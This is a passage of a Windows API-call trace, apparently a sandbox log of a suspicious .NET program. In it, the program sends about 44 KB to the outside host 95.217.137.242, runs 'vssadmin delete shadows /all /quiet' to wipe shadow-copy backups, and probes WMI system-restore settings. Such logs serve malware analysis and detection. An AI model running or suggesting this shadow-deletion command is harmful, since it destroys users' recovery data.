0xba4 [0110.980] ResetEvent (hEvent=0xb8) returned 1 [0110.980] GetCurrentThreadId () returned 0xba4 [0110.980] GetCurrentThreadId () returned 0xba4 [0110.980] GetCurrentThreadId () returned 0xba4 [0110.980] GetCurrentThreadId () returned 0xba4 [0110.980] ResetEvent (hEvent=0xb8) returned 1 [0110.980] GetCurrentThreadId () returned 0xba4 [0110.980] GetCurrentThreadId () returned 0xba4 [0110.980] SetEvent (hEvent=0xbc) returned 1 [0110.980] SetEvent (hEvent=0xb8) returned 1 [0110.980] CloseHandle (hObject=0x458) returned 1 [0111.008] SysReAllocStringLen (in: pbstr=0x419fe0*=0x0, psz="kernel32.dll", len=0xc | out: pbstr=0x419fe0*="kernel32.dll") returned 1 [0111.008] CharLowerBuffW (in: lpsz="kernel32.dll", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0111.009] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0111.012] GetProcAddress (hModule=0x76d30000, lpProcName="GetNativeSystemInfo") returned 0x76d510b5 [0111.013] GetCurrentThreadId () returned 0xba4 [0111.013] ResetEvent (hEvent=0xb8) returned 1 [0111.013] GetCurrentThreadId () returned 0xba4 [0111.013] GetCurrentThreadId () returned 0xba4 [0111.013] GetCurrentThreadId () returned 0xba4 [0111.013] GetCurrentThreadId () returned 0xba4 [0111.013] ResetEvent (hEvent=0xb8) returned 1 [0111.013] GetCurrentThreadId () returned 0xba4 [0111.013] GetCurrentThreadId () returned 0xba4 [0111.013] SetEvent (hEvent=0xbc) returned 1 [0111.013] SetEvent (hEvent=0xb8) returned 1 [0111.013] CloseHandle (hObject=0x458) returned 1 [0111.025] SysReAllocStringLen (in: pbstr=0x419fe0*=0x0, psz="kernel32.dll", len=0xc | out: pbstr=0x419fe0*="kernel32.dll") returned 1 [0111.025] CharLowerBuffW (in: lpsz="kernel32.dll", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0111.026] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0111.029] GetProcAddress (hModule=0x76d30000, lpProcName="GetNativeSystemInfo") returned 0x76d510b5 [0111.030] GetCurrentThreadId () returned 0xba4 [0111.031] ResetEvent (hEvent=0xb8) returned 1 [0111.031] GetCurrentThreadId () returned 0xba4 [0111.031] GetCurrentThreadId () returned 0xba4 [0111.031] GetCurrentThreadId () returned 0xba4 [0111.031] GetCurrentThreadId () returned 0xba4 [0111.031] ResetEvent (hEvent=0xb8) returned 1 [0111.031] GetCurrentThreadId () returned 0xba4 [0111.031] GetCurrentThreadId () returned 0xba4 [0111.031] SetEvent (hEvent=0xbc) returned 1 [0111.031] SetEvent (hEvent=0xb8) returned 1 [0111.031] CloseHandle (hObject=0x458) returned 1 [0111.052] SysReAllocStringLen (in: pbstr=0x419fe0*=0x0, psz="kernel32.dll", len=0xc | out: pbstr=0x419fe0*="kernel32.dll") returned 1 [0111.052] CharLowerBuffW (in: lpsz="kernel32.dll", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0111.052] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0111.055] GetProcAddress (hModule=0x76d30000, lpProcName="GetNativeSystemInfo") returned 0x76d510b5 [0111.056] GetCurrentThreadId () returned 0xba4 [0111.056] ResetEvent (hEvent=0xb8) returned 1 [0111.056] GetCurrentThreadId () returned 0xba4 [0111.056] GetCurrentThreadId () returned 0xba4 [0111.056] GetCurrentThreadId () returned 0xba4 [0111.056] GetCurrentThreadId () returned 0xba4 [0111.056] ResetEvent (hEvent=0xb8) returned 1 [0111.056] GetCurrentThreadId () returned 0xba4 [0111.057] GetCurrentThreadId () returned 0xba4 [0111.057] SetEvent (hEvent=0xbc) returned 1 [0111.057] SetEvent (hEvent=0xb8) returned 1 [0111.057] CloseHandle (hObject=0x458) returned 1 [0111.077] SysReAllocStringLen (in: pbstr=0x419fe0*=0x0, psz="kernel32.dll", len=0xc | out: pbstr=0x419fe0*="kernel32.dll") returned 1 [0111.077] CharLowerBuffW (in: lpsz="kernel32.dll", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0111.078] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0111.081] GetProcAddress (hModule=0x76d30000, lpProcName="GetNativeSystemInfo") returned 0x76d510b5 [0111.082] GetCurrentThreadId () returned 0xba4 [0111.082] ResetEvent (hEvent=0xb8) returned 1 [0111.082] GetCurrentThreadId () returned 0xba4 [0111.082] GetCurrentThreadId () returned 0xba4 [0111.082] GetCurrentThreadId () returned 0xba4 [0111.082] GetCurrentThreadId () returned 0xba4 [0111.082] ResetEvent (hEvent=0xb8) returned 1 [0111.082] GetCurrentThreadId () returned 0xba4 [0111.082] GetCurrentThreadId () returned 0xba4 [0111.082] SetEvent (hEvent=0xbc) returned 1 [0111.082] SetEvent (hEvent=0xb8) returned 1 [0111.082] CloseHandle (hObject=0x458) returned 1 [0111.094] SysReAllocStringLen (in: pbstr=0x419fe0*=0x0, psz="kernel32.dll", len=0xc | out: pbstr=0x419fe0*="kernel32.dll") returned 1 [0111.094] CharLowerBuffW (in: lpsz="kernel32.dll", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0111.094] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0111.097] GetProcAddress (hModule=0x76d30000, lpProcName="GetNativeSystemInfo") returned 0x76d510b5 [0111.100] SysReAllocStringLen (in: pbstr=0x41a6e8*=0x0, psz="Microsoft.VisualBasic.ni.dll", len=0x1c | out: pbstr=0x41a6e8*="Microsoft.VisualBasic.ni.dll") returned 1 [0111.100] CharLowerBuffW (in: lpsz="Microsoft.VisualBasic.ni.dll", cchLength=0x1c | out: lpsz="microsoft.visualbasic.ni.dll") returned 0x1c [0111.100] LoadLibraryExW (lpLibFileName="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Microsoft.V9921e851#\\cfbddeb6e93e8f421b92229b20e51233\\Microsoft.VisualBasic.ni.dll", hFile=0x0, dwFlags=0x8) returned 0x70dc0000 [0111.131] GetLastError () returned 0x0 [0111.181] SysReAllocStringLen (in: pbstr=0x41dfa8*=0x0, psz="Kernel32.dll", len=0xc | out: pbstr=0x41dfa8*="Kernel32.dll") returned 1 [0111.181] CharLowerBuffW (in: lpsz="Kernel32.dll", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0111.181] LoadLibraryExW (lpLibFileName="Kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x76d30000 [0111.181] GetLastError () returned 0x0 [0111.185] GetProcAddress (hModule=0x76d30000, lpProcName="GlobalMemoryStatusExW") returned 0x0 [0111.188] GlobalMemoryStatusEx (in: lpBuffer=0x348e078 | out: lpBuffer=0x348e078) returned 1 [0111.219] QueryPerformanceCounter (in: lpPerformanceCount=0x41ebac | out: lpPerformanceCount=0x41ebac*=23127313495) returned 1 [0111.222] SetEvent (hEvent=0x248) returned 1 [0111.223] GetProcAddress (hModule=0x77230000, lpProcName="select") returned 0x77236989 [0111.223] select (in: nfds=0, readfds=0x34f2918, writefds=0x0, exceptfds=0x0, timeout=0x41ea84*(tv_sec=0, tv_usec=0) | out: readfds=0x34f2918, writefds=0x0, exceptfds=0x0) returned 1 [0111.225] GetProcAddress (hModule=0x77230000, lpProcName="shutdown") returned 0x7723449d [0111.225] shutdown (s=0x3cc, how=2) returned 0 [0111.226] setsockopt (s=0x3cc, level=65535, optname=128, optval="\x01", optlen=4) returned 0 [0111.226] closesocket (s=0x3cc) returned 0 [0111.226] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x3cc [0111.226] WSASocketW (af=23, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x450 [0111.228] WSAConnect (in: s=0x3cc, name=0x34f2d68*(sa_family=2, sin_port=0x50, sin_addr="95.217.137.242"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned 0 [0111.272] closesocket (s=0x450) returned 0 [0111.273] send (s=0x3cc, buf=0x3436c8c*, len=145, flags=0) returned 145 [0111.274] select (in: nfds=0, readfds=0x34fe028, writefds=0x0, exceptfds=0x0, timeout=0x41e91c*(tv_sec=0, tv_usec=350000) | out: readfds=0x34fe028, writefds=0x0, exceptfds=0x0) returned 1 [0111.324] setsockopt (s=0x3cc, level=65535, optname=4102, optval=" \x86\x01", optlen=4) returned 0 [0111.324] recv (in: s=0x3cc, buf=0x3432124, len=4096, flags=0 | out: buf=0x3432124*) returned 25 [0111.324] send (s=0x3cc, buf=0x34e72e0*, len=44123, flags=0) returned 44123 [0111.325] recv (in: s=0x3cc, buf=0x3432124, len=4096, flags=0 | out: buf=0x3432124*) returned 1192 [0111.974] setsockopt (s=0x3cc, level=65535, optname=4102, optval="à\x93\x04", optlen=4) returned 0 [0111.975] recv (in: s=0x3cc, buf=0x3432124, len=12, flags=0 | out: buf=0x3432124*) returned 5 [0111.998] GetProcAddress (hModule=0x76d30000, lpProcName="GetStdHandle") returned 0x76d451b3 [0111.998] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0112.001] GetProcAddress (hModule=0x76d30000, lpProcName="LocalFree") returned 0x76d42d3c [0112.004] GetProcAddress (hModule=0x76d30000, lpProcName="CreatePipe") returned 0x76dc415b [0112.006] GetProcAddress (hModule=0x76d30000, lpProcName="CreatePipeW") returned 0x0 [0112.007] CreatePipe (in: hReadPipe=0x41ebd0, hWritePipe=0x41ebcc, lpPipeAttributes=0x41eb50, nSize=0x0 | out: hReadPipe=0x41ebd0*=0x458, hWritePipe=0x41ebcc*=0x45c) returned 1 [0112.010] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x458, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x41ebd4, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x41ebd4*=0x460) returned 1 [0112.010] CloseHandle (hObject=0x458) returned 1 [0112.010] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0112.010] CoTaskMemAlloc (cb=0x20e) returned 0x7a5f90 [0112.010] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x7a5f90 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0112.010] CoTaskMemFree (pv=0x7a5f90) [0112.011] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"cmd.exe\" /c vssadmin.exe delete shadows /all /quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x41eaf0*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x45c, hStdError=0x0), lpProcessInformation=0x3520278 | out: lpCommandLine="\"cmd.exe\" /c vssadmin.exe delete shadows /all /quiet", lpProcessInformation=0x3520278*(hProcess=0x464, hThread=0x458, dwProcessId=0xb40, dwThreadId=0xb5c)) returned 1 [0112.065] GetConsoleOutputCP () returned 0x0 [0112.065] GetFileType (hFile=0x460) returned 0x3 [0112.066] CloseHandle (hObject=0x458) returned 1 [0112.068] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xba0) returned 0x458 [0112.069] GetExitCodeProcess (in: hProcess=0x458, lpExitCode=0x3523df0 | out: lpExitCode=0x3523df0*=0x103) returned 1 [0112.082] IsWow64Process (in: hProcess=0x458, Wow64Process=0x41ed00 | out: Wow64Process=0x41ed00) returned 1 [0112.092] GetProcAddress (hModule=0x76d30000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x76d5d650 [0112.095] GetProcAddress (hModule=0x76d30000, lpProcName="Wow64DisableWow64FsRedirectionW") returned 0x0 [0112.095] Wow64DisableWow64FsRedirection (in: OldValue=0x41ed6c | out: OldValue=0x41ed6c*=0x0) returned 1 [0112.095] CoTaskMemAlloc (cb=0x20c) returned 0x7a5f90 [0112.095] SHGetFolderPathW (in: hwnd=0x0, csidl=36, hToken=0x0, dwFlags=0x0, pszPath=0x7a5f90 | out: pszPath="C:\\Windows") returned 0x0 [0112.096] CoTaskMemFree (pv=0x7a5f90) [0112.096] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x41e750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0112.096] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"cmd\" /C vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows", lpStartupInfo=0x41eb00*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3524514 | out: lpCommandLine="\"cmd\" /C vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x3524514*(hProcess=0x468, hThread=0x46c, dwProcessId=0xbb4, dwThreadId=0xbbc)) returned 1 [0112.436] CloseHandle (hObject=0x46c) returned 1 [0112.449] CoGetObjectContext (in: riid=0x346e308*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x41ec94 | out: ppv=0x41ec94*=0x72015c) returned 0x0 [0112.449] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x41ec8c | out: pAptType=0x41ec8c*=1) returned 0x0 [0112.449] IUnknown:QueryInterface (in: This=0x72015c, riid=0x346e2f0*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x41ec90 | out: ppvObject=0x41ec90*=0x0) returned 0x80004002 [0112.449] IUnknown:Release (This=0x72015c) returned 0x1 [0112.451] CoGetClassObject (in: rclsid=0x7588a4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x41e600 | out: ppv=0x41e600*=0x6720d80) returned 0x0 [0112.451] WbemDefPath:IUnknown:QueryInterface (in: This=0x6720d80, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x41e818 | out: ppvObject=0x41e818*=0x0) returned 0x80004002 [0112.451] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6720d80, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e82c | out: ppvObject=0x41e82c*=0x6730c70) returned 0x0 [0112.451] WbemDefPath:IUnknown:Release (This=0x6720d80) returned 0x0 [0112.451] WbemDefPath:IUnknown:QueryInterface (in: This=0x6730c70, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e44c | out: ppvObject=0x41e44c*=0x6730c70) returned 0x0 [0112.451] WbemDefPath:IUnknown:QueryInterface (in: This=0x6730c70, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x41e408 | out: ppvObject=0x41e408*=0x0) returned 0x80004002 [0112.451] WbemDefPath:IUnknown:AddRef (This=0x6730c70) returned 0x3 [0112.451] WbemDefPath:IUnknown:QueryInterface (in: This=0x6730c70, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x41dd64 | out: ppvObject=0x41dd64*=0x0) returned 0x80004002 [0112.451] WbemDefPath:IUnknown:QueryInterface (in: This=0x6730c70, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x41dd14 | out: ppvObject=0x41dd14*=0x0) returned 0x80004002 [0112.451] WbemDefPath:IUnknown:QueryInterface (in: This=0x6730c70, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41dd20 | out: ppvObject=0x41dd20*=0x765208) returned 0x0 [0112.451] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x765208, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x41dd28 | out: pCid=0x41dd28*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0112.452] WbemDefPath:IUnknown:Release (This=0x765208) returned 0x3 [0112.452] CoGetContextToken (in: pToken=0x41dd80 | out: pToken=0x41dd80) returned 0x0 [0112.452] CoGetContextToken (in: pToken=0x41e188 | out: pToken=0x41e188) returned 0x0 [0112.452] WbemDefPath:IUnknown:QueryInterface (in: This=0x6730c70, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e218 | out: ppvObject=0x41e218*=0x0) returned 0x80004002 [0112.452] WbemDefPath:IUnknown:Release (This=0x6730c70) returned 0x2 [0112.452] WbemDefPath:IUnknown:Release (This=0x6730c70) returned 0x1 [0112.452] CoGetContextToken (in: pToken=0x41eb10 | out: pToken=0x41eb10) returned 0x0 [0112.452] CoGetContextToken (in: pToken=0x41ea70 | out: pToken=0x41ea70) returned 0x0 [0112.452] WbemDefPath:IUnknown:QueryInterface (in: This=0x6730c70, riid=0x41eb40*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x41eb3c | out: ppvObject=0x41eb3c*=0x6730c70) returned 0x0 [0112.452] WbemDefPath:IUnknown:AddRef (This=0x6730c70) returned 0x3 [0112.452] WbemDefPath:IUnknown:Release (This=0x6730c70) returned 0x2 [0112.452] WbemDefPath:IWbemPath:SetText (This=0x6730c70, uMode=0x4, pszPath="\\\\.\\root\\default") returned 0x0 [0112.452] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6730c70, puCount=0x41ecbc | out: puCount=0x41ecbc*=0x2) returned 0x0 [0112.452] WbemDefPath:IWbemPath:GetText (in: This=0x6730c70, lFlags=4, puBuffLength=0x41ecb8*=0x0, pszText=0x0 | out: puBuffLength=0x41ecb8*=0x11, pszText=0x0) returned 0x0 [0112.452] WbemDefPath:IWbemPath:GetText (in: This=0x6730c70, lFlags=4, puBuffLength=0x41ecb8*=0x11, pszText="0000000000000000" | out: puBuffLength=0x41ecb8*=0x11, pszText="\\\\.\\root\\default") returned 0x0 [0112.452] CoGetObjectContext (in: riid=0x346e308*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x41ec94 | out: ppv=0x41ec94*=0x72015c) returned 0x0 [0112.452] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x41ec8c | out: pAptType=0x41ec8c*=1) returned 0x0 [0112.453] IUnknown:QueryInterface (in: This=0x72015c, riid=0x346e2f0*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x41ec90 | out: ppvObject=0x41ec90*=0x0) returned 0x80004002 [0112.453] IUnknown:Release (This=0x72015c) returned 0x1 [0112.453] CoGetClassObject (in: rclsid=0x7588a4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x41e600 | out: ppv=0x41e600*=0x672f850) returned 0x0 [0112.454] WbemDefPath:IUnknown:QueryInterface (in: This=0x672f850, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x41e818 | out: ppvObject=0x41e818*=0x0) returned 0x80004002 [0112.454] WbemDefPath:IClassFactory:CreateInstance (in: This=0x672f850, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e82c | out: ppvObject=0x41e82c*=0x6730268) returned 0x0 [0112.454] WbemDefPath:IUnknown:Release (This=0x672f850) returned 0x0 [0112.454] WbemDefPath:IUnknown:QueryInterface (in: This=0x6730268, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e44c | out: ppvObject=0x41e44c*=0x6730268) returned 0x0 [0112.454] WbemDefPath:IUnknown:QueryInterface (in: This=0x6730268, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x41e408 | out: ppvObject=0x41e408*=0x0) returned 0x80004002 [0112.454] WbemDefPath:IUnknown:AddRef (This=0x6730268) returned 0x3 [0112.454] WbemDefPath:IUnknown:QueryInterface (in: This=0x6730268, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x41dd64 | out: ppvObject=0x41dd64*=0x0) returned 0x80004002 [0112.454] WbemDefPath:IUnknown:QueryInterface (in: This=0x6730268, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x41dd14 | out: ppvObject=0x41dd14*=0x0) returned 0x80004002 [0112.455] WbemDefPath:IUnknown:QueryInterface (in: This=0x6730268, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41dd20 | out: ppvObject=0x41dd20*=0x765248) returned 0x0 [0112.455] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x765248, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x41dd28 | out: pCid=0x41dd28*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0112.455] WbemDefPath:IUnknown:Release (This=0x765248) returned 0x3 [0112.455] CoGetContextToken (in: pToken=0x41dd80 | out: pToken=0x41dd80) returned 0x0 [0112.455] CoGetContextToken (in: pToken=0x41e188 | out: pToken=0x41e188) returned 0x0 [0112.455] WbemDefPath:IUnknown:QueryInterface (in: This=0x6730268, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e218 | out: ppvObject=0x41e218*=0x0) returned 0x80004002 [0112.455] WbemDefPath:IUnknown:Release (This=0x6730268) returned 0x2 [0112.455] WbemDefPath:IUnknown:Release (This=0x6730268) returned 0x1 [0112.455] CoGetContextToken (in: pToken=0x41eb10 | out: pToken=0x41eb10) returned 0x0 [0112.455] CoGetContextToken (in: pToken=0x41ea70 | out: pToken=0x41ea70) returned 0x0 [0112.455] WbemDefPath:IUnknown:QueryInterface (in: This=0x6730268, riid=0x41eb40*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x41eb3c | out: ppvObject=0x41eb3c*=0x6730268) returned 0x0 [0112.456] WbemDefPath:IUnknown:AddRef (This=0x6730268) returned 0x3 [0112.456] WbemDefPath:IUnknown:Release (This=0x6730268) returned 0x2 [0112.456] WbemDefPath:IWbemPath:SetText (This=0x6730268, uMode=0x4, pszPath="systemrestore") returned 0x0 [0112.456] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6730268, puCount=0x41ecc0 | out: puCount=0x41ecc0*=0x0) returned 0x0 [0112.456] WbemDefPath:IWbemPath:GetText (in: This=0x6730268, lFlags=2, puBuffLength=0x41ecbc*=0x0, pszText=0x0 | out: puBuffLength=0x41ecbc*=0xe, pszText=0x0) returned 0x0 [0112.456] WbemDefPath:IWbemPath:GetText (in: This=0x6730268, lFlags=2, puBuffLength=0x41ecbc*=0xe, pszText="0000000000000" | out: puBuffLength=0x41ecbc*=0xe, pszText="systemrestore") returned 0x0 [0112.456] WbemDefPath:IWbemPath:GetInfo (in: This=0x6730268, uRequestedInfo=0x0, puResponse=0x41ecc8 | out: puResponse=0x41ecc8*=0xc15) returned 0x0 [0112.456] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6730268, puCount=0x41ecc0 | out: puCount=0x41ecc0*=0x0) returned 0x0 [0112.456] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6730c70, puCount=0x41ecc0 | out: puCount=0x41ecc0*=0x2) returned 0x0 [0112.456] WbemDefPath:IWbemPath:GetText (in: This=0x6730c70, lFlags=16, puBuffLength=0x41ecbc*=0x0, pszText=0x0 | out: puBuffLength=0x41ecbc*=0xd, pszText=0x0) returned 0x0 [0112.456] WbemDefPath:IWbemPath:GetText (in: This=0x6730c70, lFlags=16, puBuffLength=0x41ecbc*=0xd, pszText="000000000000" | out: puBuffLength=0x41ecbc*=0xd, pszText="root\\default") returned 0x0 [0112.456] WbemDefPath:IWbemPath:GetText (in: This=0x6730268, lFlags=2, puBuffLength=0x41ecc4*=0x0, pszText=0x0 | out: puBuffLength=0x41ecc4*=0xe, pszText=0x0) returned 0x0 [0112.456] WbemDefPath:IWbemPath:GetText (in: This=0x6730268, lFlags=2, puBuffLength=0x41ecc4*=0xe, pszText="0000000000000" | out: puBuffLength=0x41ecc4*=0xe, pszText="systemrestore") returned 0x0 [0112.456] CoGetObjectContext (in: 